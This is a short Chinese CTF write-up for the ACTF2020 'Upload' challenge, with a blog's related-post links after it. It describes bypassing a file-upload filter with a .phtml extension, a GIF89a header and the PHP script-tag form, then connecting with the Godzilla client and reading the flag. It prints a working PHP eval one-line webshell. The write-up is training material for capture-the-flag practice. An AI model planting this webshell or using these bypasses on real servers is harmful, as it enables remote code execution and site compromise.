[ACTF2020 新生赛]Upload

先写一个万能的一句话木马

  • 使用一句话木马

  • 发现这个是有内容过滤的 过滤了 <?

  • 发现这个过滤的很死

  • 那就只能使用 不带 ? 的短标签了 使用script 标签 这个的使用只限于对方的php是5版本的

  • 正好是低版本的

  • 所以直接上传 改一下后缀为 phtml

  • 成功上传 但是我们没有找到具体的上传地址 :1、目录扫描 2、猜一下是不是 upload 目录

  • 发现猜对了

  • 哥斯拉链接

  • 找一下flag

  • flag{537f95ae-87a4-43f4-973a-1492ae8a92af}

  • 知识点 : 1、php 后缀的绕过 : phtml

  • 2、 php短标签的绕过(只有php版本为5开头的才行) :

  • GIF89a // 这个是万能标签 防止 MIME 检查文件头

  • <script language="php">

  • eval($_POST'pass');

  • </script>

相关推荐
蒲公英eric21 小时前
从旧接口泄露到 OAuth 保护:DVWA API 模块完整漏洞分析教程
web安全·ai·ctf·dvwa·ai安全·api模块
白猫不黑2 天前
CTF是什么?从零理解一场攻防竞赛
网络·web安全·计算机·网络安全·信息安全·ctf·红蓝对抗
玫幽倩3 天前
2026第二届湾区杯网络安全大赛决赛(AI专项赛道静态题wp)
pytorch·python·ai·agent·ctf·rag·湾区杯
落寞的魚丶5 天前
2026年浙江省信息通信业职业技能竞赛(信息安全测试员竞赛) 初赛Wireup
ctf·鱼影安全·2026网络安全通信行业·信息安全测试员竞赛·通信职业技能大赛
合天网安实验室10 天前
Modbus协议及其取证的学习笔记
ctf·modbus·通信协议·取证
努力的lpp10 天前
php反序列化一(大白话版)
开发语言·web安全·php·ctf·反序列化
蒲公英eric10 天前
从直接重定向到白名单验证:DVWA 开放重定向模块完整漏洞分析教程
web安全·ai·ctf·dvwa·ai安全·开放重定向模块
蒲公英eric12 天前
从页面检查到功能验证:DVWA 授权绕过模块完整漏洞分析教程
web安全·ai·ctf·dvwa·ai安全·授权绕过模块
Sagittarius_A*14 天前
[LitCTF 2026] lit_elgamal_handshake
密码学·ctf·crypto·elgamal
0xBADCODE17 天前
CTF Writeup 合集
安全·web安全·网络安全·系统安全·密码学·php·ctf